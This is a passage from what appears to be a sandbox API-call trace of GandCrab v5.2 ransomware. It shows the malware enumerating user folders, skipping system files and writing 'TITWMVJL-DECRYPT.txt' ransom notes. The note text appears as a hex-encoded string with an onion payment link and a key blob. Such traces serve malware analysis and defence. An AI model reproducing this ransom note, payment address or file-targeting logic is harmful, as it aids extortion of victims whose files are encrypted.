flProtect=0x4) returned 0x2410000 [0096.382] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.382] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.382] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.383] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.383] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0096.383] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.383] lstrcatW (in: lpString1="C:\\Users\\Default\\Downloads\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\Downloads\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Default\\Downloads\\TITWMVJL-DECRYPT.txt" [0096.383] lstrlenW (lpString=".titwmvjl") returned 9 [0096.383] lstrlenW (lpString="C:\\Users\\Default\\Downloads\\TITWMVJL-DECRYPT.txt") returned 47 [0096.383] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.383] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\Downloads\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 56 [0096.383] lstrlenW (lpString="C:\\Users\\Default\\Downloads\\TITWMVJL-DECRYPT.txt") returned 47 [0096.383] lstrlenW (lpString=".txt") returned 4 [0096.383] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.383] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.383] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.383] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.384] lstrlenW (lpString="C:\\Users\\Default\\Downloads\\TITWMVJL-DECRYPT.txt") returned 47 [0096.384] lstrlenW (lpString="C:\\Users\\Default\\Downloads\\TITWMVJL-DECRYPT.txt") returned 47 [0096.384] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.384] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.384] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.384] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.384] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.384] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.384] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.384] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.384] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.384] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0096.384] FindClose (in: hFindFile=0x5038f8 | out: hFindFile=0x5038f8) returned 1 [0096.385] CloseHandle (hObject=0x230) returned 1 [0096.385] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.385] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0096.385] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0096.385] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Favorites" | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0096.385] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\") returned="C:\\Users\\Default\\Favorites\\" [0096.385] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.385] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.385] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.386] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.386] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.386] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.386] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.386] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.386] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.386] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.387] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.387] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Favorites\\\\TITWMVJL-DECRYPT.txt") returned 48 [0096.387] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\favorites\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0096.388] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x